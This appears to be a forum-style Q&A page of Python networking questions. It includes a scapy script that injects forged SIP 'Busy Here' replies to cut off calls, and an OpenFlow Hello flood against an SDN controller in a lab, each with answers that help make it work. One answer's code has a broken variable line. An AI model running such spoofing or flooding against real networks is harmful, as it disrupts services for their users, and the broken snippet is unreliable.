Intro
I am using python3 and scapy to modify and resend a captured packet.
The issue
When I send the modified payload in the Raw section the \r and \n parts of the message are not interpreted as special characters. Instead they are included as strings as shown in the cmd and wireshark screenshots below.
Current Payload
Expected Payload
This is a correct packet format captured on the network.
The packet displayed in wireshark is the following:
SIP/2.0 486 Busy Here
Via: SIP/2.0/UDP 192.168.1.5:5060;branch=z9hG4bK226016822;received=192.168.1.5;rport=5060
From: sip:301#192.168.1.2;tag=2032604445
To: sip:300#192.168.1.2;tag=as1b0290be
Call-ID: 338695025
CSeq: 21 INVITE
Server: Asterisk PBX 16.10.0
Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE
Supported: replaces, timer
X-Asterisk-HangupCause: Call Rejected
X-Asterisk-HangupCauseCode: 21
Content-Length: 0
The code
This is the code so far:
from scapy.all import sniff, Ether, IP, UDP, sendp, ICMP, rdpcap,Raw
import scapy.fields
import re
import codecs
import argparse
def traffic_parser(packet):
BUSY_1 = 'SIP/2.0 486 Busy Here'
BUSY_2 = 'X-Asterisk-HangupCause: Call Rejected\\\\r\\\\nX-Asterisk-HangupCauseCode: 21'
payload = packet[3].command()
print(bytes(payload))
header=re.findall("Ringing", payload)
if header:
eth_attributes={}
eth_attributes['dst']=packet[0].dst
eth_attributes['src']=packet[0].src
eth_attributes['type']=packet[0].type
eth = Ether_layer(eth_attributes)
udp_attributes={}
udp_attributes['sport']=packet[2].sport
udp_attributes['dport']=packet[2].dport
udp_attributes['len']=444
udp = UDP_layer(udp_attributes)
# Implement packet modification
payload = payload.replace("SIP/2.0 180 Ringing", BUSY_1, 1)
payload = re.sub("Contact\:.*>", BUSY_2, payload,1)
payload = payload.replace("Raw(load=b\'", '', 1)
payload = re.sub("\'\)$", '', payload, 1)
for incr in range(1,5):
ip_attributes={}
ip_attributes['version']=packet[1].version
ip_attributes['tos']=packet[1].tos
ip_attributes['len']=464
ip_attributes['id']=0 #Zero is handled by scapy on send by default
ip_attributes['flags']=packet[1].flags
ip_attributes['frag']=packet[1].frag
ip_attributes['ttl']=packet[1].ttl
ip_attributes['proto']=packet[1].proto
ip_attributes['src']=packet[1].src
ip_attributes['dst']=packet[1].dst
ip = IP_layer(ip_attributes)
sendp(eth/ip/udp/Raw(load=payload))
print(payload)
print(Raw(load=payload))
print("\n")
def Ether_layer(attributes):
layer2=Ether()
layer2.dst=attributes['dst']
layer2.src=attributes['src']
layer2.type=attributes['type']
return layer2
def IP_layer(attributes):
layer3=IP()
layer3.version=attributes['version']
layer3.tos=attributes['tos']
layer3.len=attributes['len']
layer3.id=attributes['id']
layer3.flags=attributes['flags']
layer3.frag=attributes['frag']
layer3.ttl=attributes['ttl']
layer3.proto=attributes['proto']
layer3.src=attributes['src']
layer3.dst=attributes['dst']
return layer3
def UDP_layer(attributes):
layer4=UDP()
layer4.sport=attributes['sport']
layer4.dport=attributes['dport']
layer4.len=attributes['len']
return layer4
parser = argparse.ArgumentParser(description="rtp replay script. Arguments: -i <interface> -f <sniff filter> -o <sniff outputfile> Interface defaults to 'eth0' and filter defaults to 'udp and port 5060'")
parser.add_argument('-i', "--interface", default="eth0", help="interface to use for sniffing")
parser.add_argument('-f', '--filter', default="udp and port 5060", help="filter to be used in scapy")
parser.add_argument('-o', "--outfile", help="output file (optional)")
parser.add_argument('-t', "--testfile", help="parse test file (optional)")
args=parser.parse_args()
if __name__ == '__main__':
if args.testfile:
packets = rdpcap(args.testfile)
for packet in packets:
traffic_parser(packet)
else:
sniff(iface=args.interface, prn=traffic_parser, filter="udp and port 5060", store=0)
Q
How can I attach the payload in the desired form?
Edit:
This pcap file can be used for testing. pcap_file
Ιndicative script execution:
sudo python byespam.py -t <filename.pcapng>
To be able to use the payload as a string you need to convert it to one and also ensure that you have the correct encoding.
In your case you should:
You should only get only the load part of the Raw from scapy.packet.Packet.
Encode the load part as UTF-8 so that Python interprets correctly the special characters.
Here is some working code for your case:
payload = packet[UDP].payload.load *
payload = payload.decode("utf-8")
then you can print the payload and it will get interpreted "correctly".
* I used UDP because in your script and the pcapng file you have only UDP packets. If there were TCP packets you should use payload = packet[TCP].payload.load
\r and \n are interpreted as literal strings because you've escaped them
Here's your string:
>>> BUSY_2 = 'X-Asterisk-HangupCause: Call Rejected\\\\r\\\\nX-Asterisk-HangupCauseCode: 21'
>>> print(BUSY_2)
X-Asterisk-HangupCause: Call Rejected\\r\\nX-Asterisk-HangupCauseCode: 21
Here's the same string, but without the escape:
>>> BUSY_2 = 'X-Asterisk-HangupCause: Call Rejected\r\nX-Asterisk-HangupCauseCode: 21'
>>> print(BUSY_2)
X-Asterisk-HangupCause: Call Rejected
X-Asterisk-HangupCauseCode: 21
Related
In python3 when sending string over UDP, it has to be in form of bytes. It results with sending string "abc" like b'abc'. I want to send pure string like in python2.
Ia am using the code like this:
myInput = "abc"
mysocket.sendto(bytearray(myInput, 'utf-8'), (IP_address, port))
what the socket sends is
b'abc'
I know I can recieve it with decode:
msg, sender_address = mysocket.recvfrom(buf)
print(msg.decode())
However, I will have to recieve it with external device so I have to send it like:
abc
not
b'abc'
I am using Python3 to forward incoming data form a tcp connection to a character device.
The code below is the part where I receive the data from the tcp stream. The data should all be interpreted as ASCII. Once a datagram of shape [...] is complete it should be sent to a character device file.
def tcp2devWorker(devwrt,tcp):
tcp2devbuf="";
while (1):
chunk=str(tcp.recv(64));
for b in range(len(chunk)):
if chunk[b]=="[":
tcp2devbuf="[";
elif chunk[b]=="]":
tcp2devbuf+="]";
print("From TCP: ",tcp2devbuf);
devwrt.write(tcp2devbuf);
devwrt.flush();
else:
tcp2devbuf+=str(chunk[b]);
Print shows 'b' in front of every chunk. I thought it is an artifact of print. But is also shows in the character device. Output of print:
From TCP: [)!!!!!!!!!!!!!!|SEFMTE8K#######################################'b'################################################################'b'################################################################'b'################################################################'b'#############################################################]
I read it has to do with the encoding but I dont get the concept right. Whatever way I encode and decode, can cannot get rid of the 'b's.
Can somebody point me at what I am missing?
If you just want to remove 'b' from tcp2devbuf. Then you can use tcp2devbuf.replace("'b'","").
Like this
def tcp2devWorker(devwrt,tcp):
tcp2devbuf="";
while (1):
chunk=str(tcp.recv(64));
for b in range(len(chunk)):
if chunk[b]=="[":
tcp2devbuf="[";
elif chunk[b]=="]":
tcp2devbuf+="]";
tcp2tcp2devbuf = devbuf.replace("'b'","") # <---
print("From TCP: ",tcp2devbuf);
devwrt.write(tcp2devbuf);
devwrt.flush();
else:
tcp2devbuf+=str(chunk[b]);
I have written the code for transferring an audio file from client to server using udp (python).
Now I am required to introduce reliability in the codes of UDP. The instructions are given as:
"You will be required to implement following to make UDP reliable:
(a) Sequence and acknowledge numbers
(b) Re-transmission (selective repeat)
(c) Window size of 5-10 UDP segments (stop n wait)
(d) Re ordering on receiver side "
THE SENDER THAT IS CLIENT CODE IS GIVEN BELOW
from socket import *
import time
# Assigning server IP and server port
serverName = "127.0.0.1"
serverPort = 5000
# Setting buffer length
buffer_length = 500
# Assigning the audio file a name
my_audio_file = r"C:\Users\mali.bee17seecs\PycharmProjects\TestProject\Aye_Rah-e-Haq_Ke_Shaheedo.mp3"
clientSocket = socket(AF_INET, SOCK_DGRAM)
# Opening the audio file
f = open(my_audio_file, "rb")
# Reading the buffer length in data
data = f.read(buffer_length)
# While loop for the transfer of file
while data:
if clientSocket.sendto(data, (serverName, serverPort)):
data = f.read(buffer_length)
time.sleep(0.02) # waiting for 0.02 seconds
clientSocket.close()
f.close()
print("File has been Transferred")
THE RECEIVER THAT IS SERVER CODE IS GIVEN BELOW
from socket import *
import select
# Assigning server IP and server port
serverName = "127.0.0.1"
serverPort = 5000
# Setting timeout
timeout = 3
serverSocket = socket(AF_INET, SOCK_DGRAM)
serverSocket.bind((serverName, serverPort))
# While loop for the receiving of file
while True:
data, serverAddress = serverSocket.recvfrom(1024)
if data:
file = open(r"C:\Users\mali.bee17seecs\PycharmProjects\TestProject\Aye_Rah-e-Haq_Ke_Shaheedo.mp3",
"wb")
while True:
ready = select.select([serverSocket], [], [], timeout)
if ready[0]:
data, serverAddress = serverSocket.recvfrom(500)
file.write(data)
else:
file.close()
print("File has been Received")
break
Before answer each request, you should know that we build a reliable UDP by adding some specific infomation before the real content, which you can think as a application layer head. We use them to do some control or collect infomation like TCP does in traffic layer by the head part. It may look like below:
struct Head {
int seq;
int size;
}
(a) Sequence and acknowledge numbers
If you're familar with TCP, it is not hard. You can set seq and when the other side receive it, the controller will judge it and to check if we need to do b/d.
(b) Re-transmission (selective repeat) & (d) Reordering on receiver side
They are familiar to realise, using GBN/ARQ/SACK algorithm to do retransmission, using some simple algorithm like sorting to do reording.
(c) Window size of 5-10 UDP segments (stop n wait)
This part need to do some thing like traffic control that TCP does. I don't how complex you want to do, it's can be really complex or simple, it depends on you.
I am writing a code where I am capturing openflow13 packets using tcpdump and wireshark. I am running mininet topo and floodlight SDN controller. Once I get my SDN controller IP and port details from the capture, I intent to create multiple OFPTHello messages and send it to the SDN Controller [sort of DDoS attack]. Although I am able to extract the controller's details, I am unable to create Scapy OFPTHello message packets.
Request to please help me identify and resolve the issue
Mininet Topo I am running-
sudo mn --topo=linear,4 --mac --controller=remote,ip=192.168.56.102 --switch=ovsk,protocols=OpenFlow13
My Code-
#!/usr/bin/env python3
try:
import time
import subprocess
import json
import sys
from scapy.all import *
from scapy.contrib.openflow import _ofp_header
from scapy.fields import ByteEnumField, IntEnumField, IntField, LongField, PacketField, ShortField, XShortField
from scapy.layers.l2 import Ether
ofp_table = {0xfe: "MAX",
0xff: "ALL"}
ofp_buffer = {0xffffffff: "NO_BUFFER"}
ofp_version = {0x04: "OpenFlow 1.3"}
ofp_type = {0: "OFPT_HELLO"}
class OFPHET(_ofp_header):
#classmethod
def dispatch_hook(cls, _pkt=None, *args, **kargs):
if _pkt and len(_pkt) >= 2:
t = struct.unpack("!H", _pkt[:2])[0]
return ofp_hello_elem_cls.get(t, Raw)
return Raw
def extract_padding(self, s):
return b"", s
class OFPTHello(_ofp_header):
name = "OFPT_HELLO"
fields_desc = [ByteEnumField("version", 0x04, ofp_version),
ByteEnumField("type", 0, ofp_type),
ShortField("len", None),
IntField("xid", 0),
PacketListField("elements", [], OFPHET, length_from=lambda pkt: pkt.len - 8)]
# Capture controller's IP address and Port
Hello_Msg = []
Switch_TCP_Port = []
p = subprocess.Popen(['sudo', 'tcpdump', '-i', 'eth1', 'port', '6653', '-w', 'capture.pcap'], stdin=subprocess.PIPE, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)
time.sleep(45)
p.terminate()
captures = rdpcap('capture.pcap')
for capture in captures:
msg = (capture.summary()).split(" ")
i = len(msg)
if (msg[i-1] == "OFPTFeaturesRequest"):
Features_Request = capture.summary()
break;
elif (msg[i-1] == "OFPTHello"):
Hello_Msg.append(capture.summary())
for Hello in Hello_Msg:
frame = Hello.split("/")[2]
port = ((frame.split(" ")[2]).split(":"))[1]
Switch_TCP_Port.append(port)
Features_Request = Features_Request.split("/")[2]
Source_Frame = (Features_Request.split(" ")[2]).split(":")
Controller_IP = Source_Frame[0]
Controller_Port = int(Source_Frame[1])
print("\nController's IP Address: %s"%Controller_IP)
print("Controller's Port: %s"%Controller_Port)
# Generating Openfow PAcket_In using Scapy
for p in Switch_TCP_Port:
p = int(p)
packet = Ether(src='08:00:27:fa:75:e9',dst='08:00:27:f1:24:22')/IP(src='192.168.56.101',dst=Controller_IP)/TCP(sport=p,dport=Controller_Port)/OFPTHello()
send(packet)
except ImportError as e:
print ("\n!!! ImportError !!!")
print ("{0}. Install it.\n".format(e))
Wireshark Capture- [Only has 4 hello packets, no Scapy packets are captured]
Question/Issue- I am able to receive the ideal number of 4 hello packets from the mininet topology. However, the new hello packets I am trying to create using scapy are not being sent/ captured by wireshark. I have attached my scapy code for reference.
In your code do this
modify the line:
send(packet)
To
send(packet,iface='eth1') where eth1 is the egress interface of the attacking VM
The reason is that even if a malformed Openflow packet is put on the wire, Wireshark will still be able to capture it, assuming your attack VM has a route to the controller VM. This means that your code is not putting the Packet on the right wire, send(packet,iface='eth1') will put it on the right wire.
So I'm connected to an IRC chat using socket.connec
I log in by passing my variables via socket.send
The log in is successful and then I sit in a while true loop using
Socket.recv(1024)
If I just continually print the response everything looks fine, but let's say I want to add to the end of the string... I noticed that socket.recv doesn't always get the full message (only grabs up to 1024 as expected) and the remainder of the message is in the next iteration of the loop.
This makes its it impossible to process the feedback line by line.
Is there a better way to constantly read the data without it getting trunked? Is it possible to figure out the size of the response before receiving it so the buffer can be set dynamically?
TCP is a stream-based protocol. Buffer the bytes received and only extract complete messages from the stream.
For complete lines, look for newline characters in the buffer.
Example server:
import socket
class Client:
def __init__(self,socket):
self.socket = socket
self.buffer = b''
def getline(self):
# if there is no complete line in buffer,
# add to buffer until there is one.
while b'\n' not in self.buffer:
data = self.socket.recv(1024)
if not data:
# socket was closed
return ''
self.buffer += data
# break the buffer on the first newline.
# note: partition(n) return "left of n","n","right of n"
line,newline,self.buffer = self.buffer.partition(b'\n')
return line + newline
srv = socket.socket()
srv.bind(('',5000))
srv.listen(1)
conn,where = srv.accept()
client = Client(conn)
print(f'Client connected on {where}')
while True:
line = client.getline()
if not line:
break
print(line)
Example client:
s=socket()
s.connect(('127.0.0.1',5000))
s.sendall(b'line one\nline two\nline three\nincomplete')
s.close()
Output on server:
Client connected on ('127.0.0.1', 2667)
b'line one\n'
b'line two\n'
b'line three\n'